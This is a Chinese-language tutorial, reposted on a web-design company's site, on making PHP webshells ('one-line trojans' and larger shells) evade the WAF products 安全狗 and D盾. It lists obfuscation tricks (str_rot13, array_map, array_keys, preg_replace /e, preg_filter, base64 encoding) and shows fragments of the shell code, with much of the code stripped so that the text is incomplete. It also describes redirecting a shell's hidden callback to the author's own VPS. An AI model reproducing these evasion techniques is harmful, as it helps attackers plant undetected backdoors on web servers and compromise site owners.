Webshell免杀怎么实现-成都创新互联网站建设

关于创新互联

多方位宣传企业产品与服务 突出企业形象

公司简介 公司的服务 荣誉资质 新闻动态 联系我们

Webshell免杀怎么实现

本篇内容主要讲解“Webshell免杀怎么实现”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“Webshell免杀怎么实现”吧!

为上海等地区用户提供了全套网页设计制作服务,及上海网站建设行业解决方案。主营业务为成都网站设计、网站建设、上海网站设计,以传统方式定制建设网站,并提供域名空间备案等一条龙服务,秉承以专业、用心的态度为用户提供真诚的服务。我们深信只要达到每一位用户的要求,就会得到认可,从而选择与我们长期合作。这样,我们也可以走得更远!

一句话木马

在渗透测试中最常用的就是一句话后门(小马)和中国菜刀的配合。如果出现某种WAF防护,就寻找一个免杀的大马挂马。

最常见的php一句话木马

这个一句话木马由两部分组成,eval用来执行接收的代码。$_POST['x']来接收数值。

本着这个原则,尝试改写一句话木马绕过WAF。

搜集了几个常用的php函数

执行代码的eval、assert、preg_replace

接收数据的$_POST、$_GET、$_REQUEST

php一句话免杀

str_rot13函数

str_rot13函数来替代assert。该函数对字符串执行ROT13编码。ROT13编码就是把每个字母在字母表中移动13位。

测试发现无法绕过安全狗。修改一下。

即可绕过安全狗。

xiaoma($_REQUEST['x']);
?>

再次修改,加了explode函数分割字符串,class封装类。可绕过D盾。

array_map函数

array_map() 函数将函数作用到数组中的每个值上,并返回一个新的数组。

即可绕过安全狗。

array_key函数

array_key() 函数也是返回包含数组的一个新数组。

"3");
$b=array_keys($a)[0];
eval($b);
?>

索引数组变化为关联数组。

即可绕过安全狗、D盾。

preg_replace函数

用来正则匹配的一个函数。

/e用来当做php代码解析。5.6版本以下实用。

测试可绕过安全狗和D盾。

preg_filter函数

根据preg_replace修改为preg_filter函数,也是用来执行正则的匹配替换。

也可以绕过D盾、安全狗。

其他

也可以绕过D盾、安全狗。

Webshell免杀怎么实现

php免杀大马

正好自己手里有一个php大马。但不免杀。尝试将源码base64加密后修改为php免杀大马。

将大马eval函数变为exit或者echo。burp抓取源代码。

Webshell免杀怎么实现

Webshell免杀怎么实现

将源代码拷贝下来,审计发现给源码存在一处后门。

Webshell免杀怎么实现

base64解码一下

Webshell免杀怎么实现

哦!!!真是可以。

将该base64地址修改为自己的vps地址。嘻嘻。

那现在只要eval函数可以执行这传base64的字符串就可以啦。

WAF对base64_encode、base64_decode查杀非常严格。

不断搜索、修改、编写,最终成功。

dama();
?>

直接将php大马源码放在code处。即可。

也可以改造php免杀一句话木马。

比如这款

访问一下。

Webshell免杀怎么实现

查看vps是否接收到。

Webshell免杀怎么实现

到此,相信大家对“Webshell免杀怎么实现”有了更深的了解,不妨来实际操作一番吧!这里是创新互联网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!


分享文章:Webshell免杀怎么实现
本文网址:http://kswsj.cn/article/jhsogj.html

其他资讯